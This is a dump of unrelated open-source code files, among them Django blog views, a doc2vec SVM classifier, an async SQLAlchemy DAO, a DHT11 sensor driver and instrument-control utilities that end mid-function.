usuarios=User.objects.all()\n return render(request, 'FECODER_APP/usuario/mostrarPerfiles.html',{'perfiles':usuarios,'avatar':img(request)})\n\n\n\ndef verPerfil(request,id):\n usuario=User.objects.get(id=id)\n avatar = Avatar.objects.filter(user = usuario)\n posts= Post.objects.filter(usuario_post=usuario).order_by('fecha_post')\n return render(request, 'FECODER_APP/usuario/verPerfil.html',{'usuario':usuario,'img':avatar[0].imagen.url,'avatar':img(request),'posts':posts})\n\n# Posts\ndef verPost(request,id):\n \n post=Post.objects.get(id=id)\n avatar = Avatar.objects.filter(user = post.usuario_post) \n \n if request.method == 'POST':\n form = formularioComentario(request.POST,request.user)\n \n if form.is_valid():\n \n new_comentario = Comentario(post_comentario=post,usuario_comentario=request.user,comentario=form.cleaned_data['comentario'],fecha_comentario=datetime.now())\n new_comentario.save()\n comentario = Comentario.objects.filter(post_comentario = post)\n comentarioForm = formularioComentario()\n return render(request, 'FECODER_APP/post/mostrarPost.html',{'post':post,'img':avatar[0].imagen.url,'avatar':img(request),'comentario':comentario,'form_comentario':comentarioForm})\n \n \n else: \n comentario = Comentario.objects.filter(post_comentario = post)\n \n form = formularioComentario(initial={'post_comentario':post,'usuario_comentario':request.user,'fecha_comentario':datetime.now(),'estatus_comentario':True})\n return render(request, 'FECODER_APP/post/mostrarPost.html',{'post':post,'img':avatar[0].imagen.url,'avatar':img(request),'comentario':comentario,'form_comentario':form})\n\n@login_required\ndef borrarPost(request,id):\n post=Post.objects.get(id=id)\n post.delete()\n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todosPost(),'first_post':primerPost(''),'formularioContacto':formularioContacto(),'avatar':img(request)})\n\n@login_required\ndef editarPost(request,id):\n post=Post.objects.get(id=id)\n if request.method == 'POST':\n form = edicionPost(request.POST,request.FILES)\n\n if form.is_valid():\n post.titulo_post=form.cleaned_data['titulo_post']\n post.contenido_post=form.cleaned_data['contenido_post']\n
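# the image is only replaced when a new file is uploaded (checked just below)\n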
post.subtitulo_post=form.cleaned_data['subtitulo_post']\n\n if form.cleaned_data['imagen_post']:\n post.imagen_post=form.cleaned_data['imagen_post']\n else:\n post.imagen_post=post.imagen_post\n\n post.save()\n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todosPost(),'first_post':primerPost(''),'formularioContacto':formularioContacto(),'avatar':img(request)})\n \n else:\n form = edicionPost(initial={'titulo_post':post.titulo_post,'contenido_post':post.contenido_post,'subtitulo_post':post.subtitulo_post,'imagen_post':post.imagen_post,'estatus_post':post.estatus_post})\n return render(request, 'FECODER_APP/post/editarPost.html',{'form_post':form,'post':post,'avatar':img(request)})\n\n@login_required\ndef desactivarPost(request,id):\n post=Post.objects.get(id=id)\n if post.estatus_post:\n post.estatus_post=False\n post.save()\n else :\n post.estatus_post=True\n post.save()\n\n \n posts= Post.objects.filter(usuario_post=request.user).order_by('fecha_post')\n avatar = Avatar.objects.filter(user = request.user)\n return render(request, 'FECODER_APP/post/misPost.html',{'posts':posts,'img':avatar[0].imagen.url,'avatar':img(request)})\n\n\ndef todosPostsUser(request):\n posts= Post.objects.filter(usuario_post=request.user).order_by('fecha_post')\n avatar = Avatar.objects.filter(user = request.user)\n return render(request, 'FECODER_APP/post/misPost.html',{'posts':posts,'img':avatar[0].imagen.url,'avatar':img(request)})\n\ndef comentarPost(request,post):\n if request.method == 'POST':\n form = formularioComentario(request.POST)\n if form.is_valid():\n comentario = form.cleaned_data['comentario']\n Comentario(post_comentario=post,usuario_comentario=request.user,comentario=comentario,fecha_comentario=datetime.now()).save()\n return \n else:\n\n form = formularioComentario()\n return render(request, 'FECODER_APP/post/comentarPost.html',{'form_comentario':form,'avatar':img(request)})\n\n\n#Contacto\n@login_required\ndef eliminarContacto(request,id):\n contacto=Contacto.objects.get(id=id)\n contacto.delete()\n return render(request, 'FECODER_APP/inicio.html',{'todos_post':todosPost(),'first_post':primerPost(''),'formularioContacto':formularioContacto(),'avatar':img(request)})\n\n\n#About\ndef about(request):\n return render(request, 'FECODER_APP/about.html',{'avatar':img(request)})\n\n\n#Extras\ndef mostrarAvatar(id):\n user = User.objects.filter(id=id).first()\n avatar = Avatar.objects.filter(user = user)\n return avatar[0].imagen.url\n\ndef img(request):\n img =''\n try:\n if not Avatar.objects.filter(user=request.user)[0].imagen.name=='default.jpg':\n avatar=Avatar.objects.filter(user=request.user)\n img=avatar[0].imagen.url\n except:\n img=''\n return img\n\ndef todosPost():\n if Post.objects.count()>0:\n return Post.objects.filter(estatus_post=True).order_by('contenido_post')\n else:\n return ''\n\ndef primerPost(tema):\n \n if Post.objects.all()!=None:\n if tema!='':\n if Post.objects.filter(estatus_post=True).filter(titulo_post__icontains=tema).first() :\n return Post.objects.filter(estatus_post=True).filter(titulo_post__icontains=tema).first()\n else:\n return Post.objects.filter(estatus_post=True).first()\n else:\n \n return Post.objects.filter(estatus_post=True).first()\n \n","repo_name":"nandocollazo03/FECODER_APP","sub_path":"FECODER_APP/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15572,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20829120759","text":"# -*- coding:utf-8 
-*-\n\"\"\"\n-------------------------------------------------\n   File Name:     svm_doc2vec\n   Description:   text classification with SVM over doc2vec features\n   Author:        Miller\n   date:          2017/9/6 0006\n-------------------------------------------------\n\"\"\"\n__author__ = 'Miller'\n\nimport gensim\nfrom sklearn.svm import SVC\nfrom classification.datasets import datasets\nfrom classification.setting import doc2vec_model\n\n\nclass svm_doc2vec(object):\n    def __init__(self):\n        self.model = gensim.models.Doc2Vec.load(doc2vec_model)\n\n    def train_doc2vec_model(self, data_path, model_path):\n        sentences = gensim.models.doc2vec.TaggedLineDocument(data_path)\n        model = gensim.models.Doc2Vec(sentences, size=200, window=5, min_count=5)\n        model.save(model_path)\n        print('num of docs: %d' % len(model.docvecs))\n\n    def load_datasets(self):\n        x_train = []\n        x_test = []\n        for idx, docvec in enumerate(self.model.docvecs):\n            if idx < 17600:\n                x_train.append(docvec)\n            else:\n                x_test.append(docvec)\n        return x_train, x_test\n\nif __name__ == '__main__':\n    train_labels = datasets.load_train_labels()\n    test_labels = datasets.load_test_labels()\n    svm_doc2vec = svm_doc2vec()\n    x_train, x_test = svm_doc2vec.load_datasets()\n    y_train = train_labels\n    y_test = test_labels\n\n    print('train doc shape: ' + str(len(x_train)) + ' , ' + str(len(x_train[0])))\n    print('test doc shape: ' + str(len(x_test)) + ' , ' + str(len(x_test[0])))\n\n    print('SVM...')\n\n    svc = SVC(kernel='rbf')\n    svc.fit(x_train, y_train)\n    predictions = svc.predict(x_test)\n    num = 0\n    predictions = predictions.tolist()\n    for i, pred in enumerate(predictions):\n        if int(pred) == int(y_test[i]):\n            num += 1\n    print('precision_score:' + str(float(num) / len(predictions)))\n\n","repo_name":"guoguolan1991/learn_tensorflow","sub_path":"classification/svm_doc2vec.py","file_name":"svm_doc2vec.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12976257689","text":"from django.shortcuts import render, redirect\n\nfrom .models import Organization\nfrom .forms import OrganizationForm\n\n# Create your views here.\ndef organization(request):\n    organization = Organization.objects.using(\"organization_db\").all() # manually selecting the database\n    \n    if request.method == \"POST\":\n        form = OrganizationForm(request.POST)\n        if form.is_valid():\n            form.save()\n            return redirect(\"/organization\")\n    else:\n        form = OrganizationForm()\n\n    context = {\n        'organization': organization,\n        'form': form,\n    }\n    return render(request, \"organization/organization.html\", context)","repo_name":"surajkarki66/django-multiple-dbs-and-analytics","sub_path":"organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1639486712","text":"\"\"\"\nPrimitive Calculator\n\nProblem Description\nTask. Given an integer n, compute the minimum number of operations needed to obtain the number n\nstarting from the number 1.\nInput Format. The input consists of a single integer 1 ≤ n ≤ 10^6.\nOutput Format. In the first line, output the minimum number k of operations needed to get n from 1.\nIn the second line output a sequence of intermediate numbers. That is, the second line should contain\npositive integers a_0, a_1, ..., a_{k-1} such that a_0 = 1, a_{k-1} = n and for all 0 ≤ i < k − 1, a_{i+1} is equal to\neither a_i + 1, 2a_i, or 3a_i. 
If there are many such sequences, output any one of them.\n\nSample 1.\nInput:\n1\nOutput:\n0\n1\n\nSample 2.\nInput:\n5\nOutput:\n3\n1 2 4 5\nHere, we first multiply 1 by 2 two times and then add 1. Another possibility is to first multiply by 3\nand then add 1 two times. Hence “1 3 4 5” is also a valid output in this case.\n\nSample 3.\nInput:\n96234\nOutput:\n14\n1 3 9 10 11 22 66 198 594 1782 5346 16038 16039 32078 96234\nAgain, another valid output in this case is “1 3 9 10 11 33 99 297 891 2673 8019 16038 16039 48117\n96234”.\n\"\"\"\n\n# Uses python3\nimport sys\n\ndef optimal_sequence(n):\n    if n == 1:\n        return [1]\n    ops = min_ops(n)\n    return construct_min_list(n, ops)\n\ndef construct_min_list(n, ops):\n    result = []\n    while(n>=1):\n        result.append(n)\n        if n%3 != 0 and n%2 != 0:\n            n -= 1\n\n        elif n%3 == 0 and n%2 == 0:\n            n = int(n/3)\n\n        elif n%3 == 0:\n            if ops[n-1] < ops[n//3]:\n                n = n-1\n            else:\n                n = n // 3\n\n        elif n%2 == 0:\n            if ops[n-1] < ops[n//2]:\n                n = n-1\n            else:\n                n = n // 2\n\n    return reversed(result)\n\ndef min_ops(n):\n    result = [0 for i in range(n+1)]\n    for i in range(2,n+1):\n        min_1 = result[i-1]\n        min_2 = sys.maxsize\n        min_3 = sys.maxsize\n\n        if i%2 == 0:\n            min_2 = result[int(i//2)]\n\n        if i%3 == 0:\n            min_3 = result[int(i//3)]\n\n        minOperations = min(min_1,min_2,min_3)+1\n        result[i] = minOperations\n\n    return result\n\ninput = sys.stdin.read()\nn = int(input)\nsequence = list(optimal_sequence(n))\nprint(len(sequence) - 1)\nfor x in sequence:\n    print(x, end=' ')\n","repo_name":"amogchandrashekar/Data-Structures-and-Algorithms-Specialization","sub_path":"Algorithmic Toolbox/week5_dynamic_programming_1/primitive_calculator.py","file_name":"primitive_calculator.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"71227252996","text":"from sqlalchemy import insert, select\n\nfrom app.database import async_session_maker\nfrom app.services.room_availability import RoomsAvailability\n\n\nclass BaseDAO:\n    model = None\n\n    get_rooms_left = RoomsAvailability.get_rooms_left\n\n    @classmethod\n    async def find_by_id(cls, model_id: int):\n        async with async_session_maker() as session:\n            query = select(cls.model).filter_by(id=model_id)\n            result = await session.execute(query)\n            return result.scalar_one_or_none()\n\n    @classmethod\n    async def find_one_or_none(cls, **filter_by):\n        async with async_session_maker() as session:\n            query = select(cls.model).filter_by(**filter_by)\n            result = await session.execute(query)\n            return result.scalar_one_or_none()\n\n    @classmethod\n    async def find_all(cls, **filter_by):\n        async with async_session_maker() as session:\n            query = select(cls.model).filter_by(**filter_by)\n            result = await session.execute(query)\n            return result.mappings().all()\n\n    @classmethod\n    async def add(cls, **data):\n        async with async_session_maker() as session:\n            query = insert(cls.model).values(**data)\n            await session.execute(query)\n            await session.commit()\n\n    @classmethod\n    async def del_by_id(cls, id: int):\n        async with async_session_maker() as session:\n            to_delete = await session.get(cls.model, id)\n\n            if to_delete:\n                await session.delete(to_delete)\n                await session.commit()\n                return True\n            else:\n                return False\n","repo_name":"Sharpylo/booking_hotels","sub_path":"app/dao/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
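Editor's note on the BaseDAO record above: the class is generic over its model attribute, so a concrete DAO only has to bind a mapped class; every inherited coroutine (find_by_id, find_one_or_none, find_all, add, del_by_id) then runs against it. A minimal sketch, assuming a hypothetical Hotels model (the import path and the city column are illustrative, not taken from the record):

    from app.hotels.models import Hotels  # hypothetical import path

    class HotelDAO(BaseDAO):
        model = Hotels  # binds the generic session/query helpers to the Hotels table

    # usage (inside an async context):
    #     hotel = await HotelDAO.find_by_id(1)
    #     oslo_hotels = await HotelDAO.find_all(city="Oslo")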
+{"seq_id":"21018200854","text":"#mummer_clusters.py - Nick Loman\n# python mummer_clusters.py Contigs_15k.fasta clustering_gt1000.csv all_input_table.tsv cov_mean_sample_1122-H-Cdiff.sorted.bam cov_mean_sample_5066-H-STEC.sorted.bam > newannotations.txt\n\nimport os\nimport sys\nimport csv\nfrom Bio import SeqIO\nfrom collections import defaultdict\n\ntag = sys.argv[1]\nclusteringfn = sys.argv[2]\ncoveragefn = sys.argv[3]\n\n##read clustering \ncontigmap = {}\nfor ln in open(clusteringfn, \"r\"):\n\tcontig, cluster_number = ln.rstrip().split(\",\")\n\tcontigmap[contig] = cluster_number\t\n\n##coverage information\ncovmap = {}\nwith open(coveragefn, 'r') as csvfile:\n\treader = csv.DictReader(csvfile, dialect='excel-tab')\n\tcol1 = reader.fieldnames.index(sys.argv[4])\n\tcol2 = reader.fieldnames.index(sys.argv[5])\n\nwith open(coveragefn, 'r') as csvfile:\n\treader = csv.reader(csvfile, dialect='excel-tab')\n\tnext(reader)\n\tfor row in reader:\n\t\tvals = [row[0], row[1], row[2], str(sum([float(x) for x in row[col1:col2+1]]))]\n\t\tcovmap[row[0]] = vals\n\nrefs = { 'NC_018658' : 'OutbreakGenome',\n 'NC_018659' : 'plasmid_pESBL',\n 'NC_018666' : 'plasmid_pAA',\n 'NC_000913' : 'Ecoli_CoreGenome', }\n\ncontig_set = defaultdict(dict)\n\nfor chrom, label in refs.items():\n\tif not os.path.exists(\"%s_%s.delta\" % (tag, chrom)):\n\t\tos.system(\"nucmer --prefix=%s_%s %s.fna %s\" % (tag, chrom, chrom, tag))\n\t#os.system(\"show-tiling %s_%s.delta > %s_%s.tiling\" % (tag, chrom, tag, chrom))\n\tos.system(\"delta-filter -i 98 %s_%s.delta > %s_%s.mummer\" % (tag, chrom, tag, chrom))\n\tfh = open(\"%s_%s.mummer\" % (tag, chrom,))\n\twhile True:\n\t\tln = fh.readline()\n\t\tif not ln: break\n\n\t\tif ln.startswith('>'):\n\t\t\tcontig = ln.rstrip().split()[1]\n\t\t\t#contig_set[label].add(contig)\n\t\t\tcoords = fh.readline()\n\t\t\tcols = coords.split(\" \")\n\t\t\tstart = cols[0]\n\t\t\tcontig_set[label][contig] = start\n\nprint(\"Contig\", end=' ')\nfor label in sorted(contig_set.keys()):\n\tprint(\"\\t\" + label, end=' ')\nprint()\n\nfor rec in SeqIO.parse(tag, \"fasta\"):\n\tprint(\"%s\\t%s\\t%s\" % (rec.id, contigmap[rec.id], \"\\t\".join(covmap[rec.id])), end=' ')\n\tfor label in sorted(contig_set.keys()):\n\t\tif rec.id in list(contig_set[label].keys()):\n\t\t\tprint(\"\\tY\\t%s\" % (contig_set[label][rec.id]), end=' ')\n\t\telse:\n\t\t\tprint(\"\\tN\\tNA\", end=' ')\n\tprint()\n","repo_name":"jtamames/SqueezeMeta","sub_path":"bin/CONCOCT-1.1.0/scripts/mummer_clusters.py","file_name":"mummer_clusters.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"61"} +{"seq_id":"13300822193","text":"\"\"\"\nInitial amino acid transition probabilities:\nNxN matrix\n\"\"\"\n\nimport initial_amino_sequence \n\ndef create_dictionary(sequence):\n keys = []\n for i in sequence:\n if i not in keys:\n keys.append(i)\n print(keys)\n diction = {}\n for key in sorted(keys): #for every key in the list of amino acids\n if key not in diction: #if key isn't already present in dictionary\n diction[key] = {} #then create a key in dictionary\n for j in sorted(keys): #then iterate over the list of keys and\n diction[key][j]=0 #set {key: {k1:0, k2:0,...kN:0}}, where kN is the Nth key in keys\n return diction\n\ndef fill_dictionary(diction,amino):\n for i in range(0,len(amino)-1):\n diction[amino[i]][amino[i+1]] += 1\n return diction \n \ndef compute_probabilities(fill,amino):\n for i in fill:\n count=0\n for j in fill[i]:\n count += 
fill[i][j] #count the number of transitions per amino acid\n        for j in fill[i]: \n            fill[i][j] /= count #compute the probability\n    return fill\n    \n\namino = initial_amino_sequence.compile_amino_sequence() #list of tokens\n\ndiction = create_dictionary(amino) #empty dictionary\nfill = fill_dictionary(diction,amino) #filled dictionary\ntransitions = compute_probabilities(fill,amino) #dictionary of probabilities\nprint(transitions)\n","repo_name":"likitha-9/Gene-Prediction-Using-HMM-Stochastic","sub_path":"amino_transitions.py","file_name":"amino_transitions.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14780752727","text":"import time\n\nimport Adafruit_DHT\n\nfrom environs import Env\n\nfrom .sensor import Sensor\n\n# Load environment variables\nenv = Env()\nenv.read_env()\n\n\nclass DHT11Exception(Exception):\n    \"\"\"\n    Unable to get a reading from DHT11.\n    \"\"\"\n\n    pass\n\n\nclass DHT11(Sensor):\n    \"\"\"\n    Class to connect to the DHT11 sensor.\n    \"\"\"\n\n    def __init__(self):\n        self._sensor = Adafruit_DHT.DHT11\n\n        self._pin = env.int(\"DHT11_PIN\", default=None)\n\n        if self._pin is None:\n            raise ValueError(\"DHT pin value must be provided.\")\n\n    def calibrate(self):\n        \"\"\"\n        During the DHT11 booting time (when the circuit turns on), the datasheet\n        says to wait 1 second before the sensor is able to respond to any commands.\n        \"\"\"\n        print(\"Calibrating DHT11 sensor...\")\n\n        time.sleep(1)\n\n        print(\"Calibrating DHT11 sensor...done!\")\n\n    def get_humidity(self):\n        \"\"\"\n        Returns a float percentage value representing the humidity measured by the DHT11 sensor.\n        According to the datasheet, the time interval between consecutive readings\n        must be at least 2 seconds.\n\n        In most cases you'll get back a temperature or humidity value when requested,\n        but a read can fail if there's electrical noise or the signal was interrupted in some way.\n        Use the read_retry method, which will retry up to 15 times to get a sensor reading\n        (waiting 2 seconds between each retry).\n        Note that sometimes you won't get a reading and\n        the results will be null (because Linux can't\n        guarantee the timing of calls to read the sensor).\n        If this happens, the method returns None (and it is necessary to try again!).\n        \"\"\"\n\n        # (Can take up to 30 seconds)\n        humidity, _temperature = Adafruit_DHT.read_retry(self._sensor, self._pin)\n\n        if humidity is not None:\n            return round(humidity, 3)\n        else:\n            raise DHT11Exception(\"Reading from DHT failed. Try again!\")\n","repo_name":"dzvid/aqs-sensor-node","sub_path":"src/sensor_node/sensing_module/sensors/dht11.py","file_name":"dht11.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"9588256353","text":"\"\"\" URL scheme for the About Hospital application \"\"\"\n\nfrom django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n    # Main page with information about the hospital\n    url(r'^$', views.about, name='about'),\n    url(r'^reference_hospital/$', views.reference_hospital, name='reference_hospital'),\n    url(r'^maternity_hospital/$', views.maternity_hospital, name='maternity_hospital'),\n    url(r'^women/$', views.women, name='women'),\n    url(r'^schedule/$', views.schedule, name='schedule'),\n    url(r'^reference_kdc/$', views.reference_kdc, name='reference_kdc'),\n    url(r'^reference_pay/$', views.reference_pay, name='reference_pay'),\n    url(r'^reception/$', views.reception, name='reception'),\n    url(r'^rules/patients-rules/$', views.patients_rules, name='patients_rules'),\n    url(r'^rules/ban/$', views.ban, name='ban'),\n    url(r'^rules/product-allow/$', views.product_allow, name='product_allow'),\n    url(r'^rules/product-disallow/$', views.product_disallow, name='product_disallow'),\n    url(r'^rules/$', views.rules, name='rules'),\n]\n","repo_name":"nvo87/MedKiosk","sub_path":"about/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38305822111","text":"from .lexer import Lexer\nfrom .parsers import parse\nfrom .errorHandler import ErrorHandler\nfrom .analyzer import Analyzer\nfrom .codegen import codegen\n\n\n# Maybe we should change the implementation of Lexer and tokenParser\n# to a pure implementation\ndef compile(path):\n    with open(path) as file:\n        x = file.read()\n\n    errorHandler = ErrorHandler()\n    lexer = Lexer(x, errorHandler)\n    tokens = lexer.tokenize()\n\n    # if there are any errors, print them\n    if errorHandler:\n        print(errorHandler)\n\n    #print(\"\\n\".join(str(x) for x in tokens))\n\n    result = parse(tokens, errorHandler)\n\n    if errorHandler:\n        print(errorHandler)\n\n    #print(result)\n\n    analysis = Analyzer(result)\n    analysis.analyze()\n    sym_table = analysis.symbol_table\n\n    gen_filename = path.split(\"/\")[-1].split(\".\")[-2] + \".S\"\n    codegen(result, gen_filename, sym_table)\n","repo_name":"devchannel/DevLang","sub_path":"DevLang/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"21039764023","text":"from scipy.io import loadmat\nimport numpy as np\n\ndef indices_to_one_hot(data, nb_classes=10):\n    \"\"\"Convert an iterable of indices to one-hot encoded labels.\"\"\"\n    targets = np.array(data).reshape(-1)\n    return np.eye(nb_classes)[targets]\n\ndef load_svhn_data(hot=True):\n    \"\"\" Helper function for loading a MAT-File\"\"\"\n    train_data = loadmat('./data/svhn_train_32x32.mat')\n    test_data = loadmat('./data/svhn_test_32x32.mat')\n    \n    #transform train data\n    train_images = train_data['X']\n    train_images = train_images.transpose((3,0,1,2))\n    train_labels = train_data['y']\n    train_labels = train_labels[:,0]\n    train_labels[train_labels == 10] = 0\n    train_labels_hot = indices_to_one_hot(train_labels.astype(int), 10)\n    \n    #transform test data\n    test_images = test_data['X']\n    test_images = test_images.transpose((3,0,1,2))\n    test_labels = test_data['y']\n    test_labels = test_labels[:,0]\n    test_labels[test_labels == 10] = 0\n    test_labels_hot = indices_to_one_hot(test_labels.astype(int), 10)\n    \n    if hot == True:\n        return train_images, train_labels_hot, test_images, test_labels_hot\n    else:\n        return train_images, train_labels, test_images, test_labels\ndef rgb2gray(images):\n    return np.expand_dims(np.dot(images, [0.2990, 0.5870, 
0.1140]), axis=3)","repo_name":"ElinaBian/Domain_Adaptation","sub_path":"data_process/svhn_data.py","file_name":"svhn_data.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"15911082593","text":"from finn.components.Box import Box\nimport finn.Color as Color\n\n\nclass CloseButton(Box):\n def __init__(self, position, width=32):\n super(CloseButton, self).__init__(rect=(position[0], position[1], width, width),\n box_color=Color.d_gray,\n border_color=Color.l_gray,\n highlight_color=Color.white,\n border=3,\n name=\"close\")\n","repo_name":"bearhockey/beer","sub_path":"src/obj/close_button.py","file_name":"close_button.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17621422313","text":"from Products.ZenUtils.Utils import getSubObjects\n\nfrom Products.ZenUtils.ZCmdBase import ZCmdBase\nfrom transaction import get_transaction\n\nclass FixIps(ZCmdBase):\n\n def fixips(self):\n ips = getSubObjects(self.dmd, self.filter, self.decend)\n self.ccount = 0\n for ip in ips:\n self.log.debug(\"fixing ip %s\", ip.id)\n int = ip.interface()\n if int:\n ip.removeRelation(\"interface\")\n ip.addRelation(\"interface\", int)\n self.ccount += 1\n if (self.ccount >= self.options.commitCount \n and not self.options.noCommit):\n self.mycommit(ip)\n if self.options.noCommit:\n self.log.info(\"not commiting any changes\")\n else:\n self.mycommit()\n\n\n def filter(self, obj):\n return obj.meta_type == \"IpAddress\"\n\n\n def decend(self, obj):\n return (obj.meta_type == \"IpNetwork\" or \n (obj.meta_type == \"To Many Relationship\" and \n (obj.id == \"subnetworks\" or obj.id == \"ipaddresses\")))\n\n\n def mycommit(self, ip=None):\n if not ip:\n ipname = \"all\"\n else:\n ipname = ip.id\n self.log.info('commiting group of ips ending with %s', ipname)\n trans = get_transaction()\n trans.note('FixIps reconnect ips')\n trans.commit()\n self.ccount = 0\n\n \n def buildOptions(self):\n ZCmdBase.buildOptions(self)\n self.parser.add_option('-x', '--commitCount',\n dest='commitCount',\n default=20,\n type=\"int\",\n help='how many lines should be loaded before commit')\n\n self.parser.add_option('-n', '--noCommit',\n dest='noCommit',\n action=\"store_true\",\n default=0,\n help='Do not store changes to the Dmd (for debugging)')\n\n\nif __name__ == \"__main__\":\n fips = FixIps()\n fips.fixips()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenUtils/FixIps.py","file_name":"FixIps.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"74485423235","text":"\nimport ktl\nimport sys\nimport logging as lg\nimport sys, os\nimport time\nimport subprocess\nfrom subprocess import PIPE\n\ndef setupMonitoring(keywords, wait=True):\n\n for key in keywords:\n key.monitor()\n\n if wait == False:\n return\n else:\n checkInitialValues(keywords)\n\ndef checkInitialValues(keywords):\n\n for keyword in keywords:\n keyword.wait(timeout=1)\n if keyword['populated'] == False:\n raise RuntimeError('Keyword %s is not available. The server might be offline.' 
% (keyword.full_name))\n\ndef say(message):\n    sys.stdout.write(message + '\\n')\n    sys.stdout.flush()\n\ndef sleepdots(seconds):\n    i = 0\n    while i < seconds:\n        i += 1\n        sys.stdout.write(\".\")\n        sys.stdout.flush()\n        time.sleep(1)\n\n    sys.stdout.write('\\n')\n\n\ndef isServerUp(server):\n    p = subprocess.Popen(['show -s '+server+' uptime'], stderr = PIPE, shell=True, stdout=PIPE)\n    output = p.communicate()\n    if \"Failed to create RPC client\" in output[1]:\n        return False\n    else:\n        say(\"Server %s is up\" % (server))\n        return True\n\n\ndef checkIfMoveIsPossible(statusKeyword):\n\n    # if the status keyword is in error, do not attempt the move\n    if statusKeyword.ascii.split(' ')[0] in ['Error:', 'Moving:','Error','Moving']:\n        lg.error(\"kcwiServer: Cannot execute requested move. Status is '%s'\" % (statusKeyword))\n        raise RuntimeError(\"Cannot start requested move. Status is %s\" % (statusKeyword))\n\ndef changeMoveMode(movemode,mode):\n\n    if mode in [0,1]:\n        movemode.write(mode)\n    else:\n        raise ValueError(\"resetMoveMode called with wrong argument (mode=%s)\" % (mode))\n\ndef checkSuccess(statusKeyword=None, mechanism=None, targetReachedExpression=None, successStatus=None):\n\n    if targetReachedExpression is None:\n        result = True\n    else:\n        result = targetReachedExpression.evaluate()\n    statusString = statusKeyword.ascii.split(' ')[0]\n    if result == False or statusString != successStatus:\n        lg.info(\"kcwiServer: %s move failed. Status is %s\" % (mechanism, statusKeyword.ascii))\n        raise RuntimeError(\"kcwiServer: %s move failed. Status is %s\" % (mechanism, statusKeyword.ascii))\n\n\ndef get_terminal_width():\n    command = ['tput','cols']\n    try:\n        width = int(subprocess.check_output(command))\n    except OSError as e:\n        print(\"Invalid command '{0}': errno ({1})\".format(command[0],e.errno))\n    except subprocess.CalledProcessError as e:\n        print(\"Command '{0}' returned non-zero exit status: ({1})\".format(command, e.returncode))\n    else:\n        return width\n\n\nclass ProgressBar(object):\n    \"\"\"ProgressBar class holds the options of the progress bar.\n    The options are:\n        start   State from which the progress starts. For example, if start is\n                5 and the end is 10, the progress of this state is 50%\n        end     State in which the progress has terminated.\n        width   Number of characters used to draw the bar.\n        fill    String used to represent the filled part of the bar.\n        blank   String used to represent the remaining space.\n        format  Format string used to render the bar.\n        incremental  Whether values passed to __add__ are treated as increments.\n    \"\"\"\n    def __init__(self, start=0, end=10, width=12, fill='=', blank='.', format='[%(fill)s>%(blank)s] %(progress)s%%', incremental=True):\n        super(ProgressBar, self).__init__()\n\n        self.start = start\n        self.end = end\n        #sz = os.get_terminal_size()\n        try:\n            self.width = get_terminal_width()-10\n        except:\n            say(\"Cannot determine terminal width. 
Using standard width.\")\n self.width=width\n #self.width = width\n self.fill = fill\n self.blank = blank\n self.format = format\n self.incremental = incremental\n self.step = 100 / float(self.width) #fix\n self.reset()\n\n def __add__(self, increment):\n increment = self._get_progress(increment)\n if 100 > self.progress + increment:\n self.progress += increment\n else:\n self.progress = 100\n return self\n\n def __str__(self):\n progressed = int(self.progress / self.step) #fix\n fill = progressed * self.fill\n blank = (self.width - progressed) * self.blank\n return self.format % {'fill': fill, 'blank': blank, 'progress': int(self.progress)}\n\n __repr__ = __str__\n\n def _get_progress(self, increment):\n return float(increment * 100) / self.end\n\n def reset(self):\n \"\"\"Resets the current progress to the start point\"\"\"\n self.progress = self._get_progress(self.start)\n return self\n\nclass AnimatedProgressBar(ProgressBar):\n \"\"\"Extends ProgressBar to allow you to use it straighforward on a script.\n Accepts an extra keyword argument named `stdout` (by default use sys.stdout)\n and may be any file-object to which send the progress status.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(AnimatedProgressBar, self).__init__(*args, **kwargs)\n self.stdout = kwargs.get('stdout', sys.stdout)\n self.disable=False\n\n def show_progress(self):\n if self.disable==True:\n return\n if hasattr(self.stdout, 'isatty') and self.stdout.isatty():\n self.stdout.write('\\r')\n else:\n self.stdout.write('\\n')\n self.stdout.write(str(self))\n self.stdout.flush()\n\ndef ProgressCallback(keyword,value,instance):\n #value = int(keyword['bin'])\n if instance.progress == 0 and int(value)==100:\n return\n instance.progress=int(value)\n instance.show_progress()\n # this produces the final new line\n if instance.progress == 100:\n # this deals with cases in which the \"100%\" is broadcast multiple times\n if instance.disable==False:\n sys.stdout.write(\"\\n\")\n instance.disable=True\n\n\ndef NullCallback(keyword,value,data):\n 